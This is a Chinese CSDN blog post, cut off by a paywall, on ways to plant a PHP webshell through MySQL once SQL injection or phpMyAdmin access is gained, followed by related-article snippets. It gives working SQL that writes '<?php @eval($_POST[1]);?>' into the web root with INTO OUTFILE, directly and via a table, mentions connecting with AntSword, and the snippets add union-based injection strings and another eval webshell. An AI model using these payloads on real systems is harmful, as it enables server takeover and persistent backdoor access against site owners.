写入mysql_通过MySQL写入webshell的几种方式

最新推荐文章于 2023-12-19 20:36:52 发布
最新推荐文章于 2023-12-19 20:36:52 发布
阅读量3.7k 收藏 15
点赞数 4
文章标签: 写入mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39872872/article/details/112589789
版权
本文详细介绍了四种通过MySQL数据库写入webshell的方法,包括使用outfile、直接写入表、开启全局日志和慢查询日志,以及利用CVE漏洞。通过这些方法,可以在具备SQL注入条件的情况下,绕过某些限制,成功部署webshell。
摘要由CSDN通过智能技术生成

当我们通过测试发现SQL注入,或拿到像phpMyAdmin之类的web数据库可视化管理工具,并想要进行下一步渗透的时候,可通过数据库写入webshell到目标服务器上,利用webshell管理工具控制目标服务器。下面将讲述几个通过MySQL数据库写入webshell的方法,以拿到phpMyAdmin为例。

-01-

通过outfile写入shell

利用条件:

1、root权限2、网站的绝对路径且具有写入权限

执行如下语句写入shell:

select '<?php  @eval($_POST[1]);?>' into outfile 'E:/phpStudy2018/PHPTutorial/WWW/shell.php';

cc57da164ac93ab6ded3eef9a7fc620c.png

使用蚁剑进行连接:

77a7d8f2fe4eb2b04ab02a9f45127be6.png

在写入的时候可能会出现如下错误:

daae6ed1570f55bd7e9b13090f1d4af1.png

这是由于在高版本的MySQL添加了个叫secure_file_priv的参数,导致我们无法导出文件,在后面会讲解如何绕过secure_file_priv,前一部分假设具有导出权限

-02-

将shell写入表中

利用条件:

1、root权限2、网站的绝对路径且具有写入权限

执行如下语句写入shell:

将shell插入一个表中insert into `sxss`(`comment`) values ('<?php  @eval($_POST[1]);?>');查询该数据表,将结果导出文件select comment from sxss into outfile 'E:/phpStudy2018/PHPTutorial/WWW/shell.php';

最低0.47元/天 解锁文章
weixin_39872872
关注
第01篇:MySQL注入点写WebShell的5种方式1
08-03
本文将探讨如何利用MySQL注入点写入WebShell的五种方法,重点关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入点至关重要。这通常发生在应用程序的输入验证不足,使得攻击者可以插入额外的SQL代码到查询...
mysql数据写入突然慢了_通过MySQL写入webshell几种方式
weixin_39648824的博客
11-28 325
当我们通过测试发现SQL注入,或拿到像phpMyAdmin之类的web数据库可视化管理工具,并想要进行下一步渗透的时候,可通过数据写入webshell到目标服务器上,利用webshell管理工具控制目标服务器。下面将讲述几个通过MySQL数据写入webshell的方法,以拿到phpMyAdmin为例。-01-通过outfile写入shell利用条件:1、root权限2、网站的绝对路径...
shell 实现mysql写入操作
afei2530的博客
07-06 443
mysql -uroot study -proot << EOF > insert into top_n_movie(movie,sumprice)values('hello kitty',100);> EOF 一定要换行 shell 实现mysql写入操作 shell语句查询mysql数据库的常用方法 转载于:https://www.cnblogs...
Mysql导入数据很慢 更改设置提速;常见mysql操作指令;关于my.ini不见的问题
qq_43399185的博客
08-24 6595
昨天需要导入数据,大概一个10M多点的sql文件,开始没导入过这么大的,用sqlyog和mysql的控制台导入都非常慢,大概3个小时了才50%,于是开始查怎么提速。文章分三个部分,1 影响速度的因素,2 介绍如何操作,3 一些关于my.ini的问题以及操作指令链接。
通过MySQL写入webshell几种方式(小宇特详解)
小宇的web博客
08-07 5587
通过MySQL写入webshell几种方式 -01-通过outfile写入shell 利用条件 1.root权限2.网站的绝对路径且具有写入权限,能够使用into outfile和into dumpfile来进行写入。 这里用了以下的shell union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/4448.php' 这里连接蚁剑 -02-将shell写入表中 利用条件 1.root权限2.网站
Shell脚本实现数据库循环新增数据
汣栀的博客
09-14 864
#!/bin/bash HOSTNAME="127.0.0.1" #数据库信息 PORT="3306" USERNAME="root" PASSWORD="1234567" DBNAME="videodb" #数据库名称 TABLENAME="dim_people_copy" #数据库中表的名称 #开始数量 min=1 #最大数量 max=10 while [ $min -le $max ] do insert_sql="insert into ${TABLENAME} VALU
Mysql注入中的outfile、dumpfile、load_file函数详解
09-09
MySQL注入是一种常见的安全漏洞,允许攻击者通过构造恶意SQL语句来操纵数据库。在这个话题中,我们将深入探讨三个与文件操作相关的MySQL函数:`INTO OUTFILE`、`INTO DUMPFILE`和`LOAD_FILE()`,它们在SQL注入攻击中...
MySQL导出一句话拿WebShell的方法
06-19
这里的数据实际上是我们希望写入WebShell脚本的内容。 ```sql INSERT INTO temp(cmd) VALUES(''); ``` 注意:这里的`''`只是一个占位符,实际应用时需要替换为真正的WebShell代码。 3. **导出文件**:通过`INTO...
PHP+MySQL 手工注入语句大全 推荐
10-29
### 写入WebShell 如果攻击者能够获取到网站的写入权限,并且magic_quotes_gpc()为OFF状态,则可以通过`INTO OUTFILE`语句将恶意代码写入Web目录下,创建一个WebShell,从而进一步控制服务器。 ### 读取系统文件...
MySQL数据库慢的原因
最新发布
csdn_life18的博客
12-19 905
例如,如果需要查询一个包含 100 万条数据的表,而表中的数据分散在 1000 个数据页中,如果 IO 读写速度为 100 MB/s,则查询该表需要 1 秒。如果需要查询的数据分散在多个数据页中,就会导致 MySQL 需要多次读取磁盘数据页,从而导致数据查询速度变慢。MySQL 数据库支持多线程并发访问,如果并发请求过多,就会导致 MySQL 服务器的 CPU 和内存资源被大量消耗,从而导致数据查询速度变慢。如果并发请求过多,就会导致 MySQL 服务器的线程池资源被大量消耗,从而导致数据查询速度变慢。
MySQLwebshell的限制
公众号shadow sock7
06-18 964
作用:用于限制文件的import/export操作。 参考: https://dev.mysql.com/doc/refman/5.7/en/server-system-variables.html#sysvar_secure_file_priv https://dev.mysql.com/doc/refman/5.7/en/privileges-provided.html#priv_file 关于MySQL注入读写文件的限制 mysql 5.7.16引入。 默认值与平台相关。 Windows上, N
shell脚本实现连接mysql数据库,并将结果输出到文本文件中
浩瀚蓝天dep的博客
05-30 1万+
本文分享下自己在学习shell过程中如何连接数据库的脚本,本人使用的是MySQL5.7,在连接过程中遇到了一个麻烦,总是报错:Using a password on the command line interface can be insecure.大致意思就是:在命令行界面上使用密码可能不安全。后来在网上查了下大多数解决情况就是更改mysql配置文件my.conf或者将错误信息重定向到/dev...
利用shellmysql数据导出到文件和执行mysql语句
storm_fury
11-23 6004
利用mysqldump导出mysql数据 导出指定条件的数据库 命令格式 mysqldump -u用户名 -p密码 -h主机 -P端口 数据库名 表名 --where &quot;sql语句&quot; &amp;gt; 路径 示例代码 #!/bin/bash #变量定义 host=&quot;127.0.0.1&quot; port=&quot;3306&quot; user=&quot;root&qu
shell脚本_获取服务器数据并插入到数据
Junior_C的博客
08-27 1547
今天写一个比较实用的脚本,实现的功能是获取服务器的各项数据写入数据库中,我们获取的数据有:服务器ip, 服务器的处理器型号,服务器存储容量,服务器运存大小,服务器当前负载。 IP=`ifconfig|grep 'Bcast'|awk '{print $2}'|sed 's/addr://g'` #ip地址 CPU_INFO=`cat /proc/cpuinfo|grep "model name"|awk '{print $4,$5,$8,$10}'` #cpu型号 DISK=`fdisk -l|.
使用shell将采集到的数据实现批量入到MySQL数据库中
牧羊人
03-27 774
业务需求 平台需要收集呼叫相关信息,涉及以下caps呼叫总数,队列情况,处理时延,程序链接数,收集之后的数据格式如下 2019-03-26 15:31:01,10.41.47.27,16,0,0,29 2019-03-26 15:31:02,10.41.47.27,12,0,2,29 2019-03-26 15:31:03,10.41.47.27,9,0,0,29 2019-03-26 15:31...
shell脚本中导入mysql数据&&执行mysql语句
热门推荐
white__cat的专栏
05-31 1万+
前言 在线下做mysql数据分析的时候,会遇到执行shell脚本里导入sql文件到mysql数据库里或者连接mysql执行指定sql语句的情况,这里介绍一下我采用的方法 导入sql文件到mysql数据库 示例代码 [html] view plaincopyprint? #变量定义  sqlname="test.sql"  dir="/sdb
SQL手工注入、mysqlshell复习
叶子的Blog
01-06 1242
Mysql 手工注入 1.1 联合注入 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ?id=0' union select 1,2,3,group_concat(column_name) fro
总结常用的 34 个 Linux Shell 脚本
hello.reader
06-25 5314
作为一名 Linux 工程师,会写好的脚本不仅能提高工作效率,还能有更多的时间做自己的事。
shell脚本实现从文件中读取数据插入mysql
08-24 7021
shell脚本无所不能,实现数据库的导入导出.最简单的就是下面的脚本,循环从文件中读出单行字符串,循环插入msql 格式是: mysql -h(数据库IP) -u(用户名) -p(密码) -P(端口) -D (数据库名) -e (sql) #!/bin/bash while read line do     echo $line     mysql -h10.147.23.120 -u
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值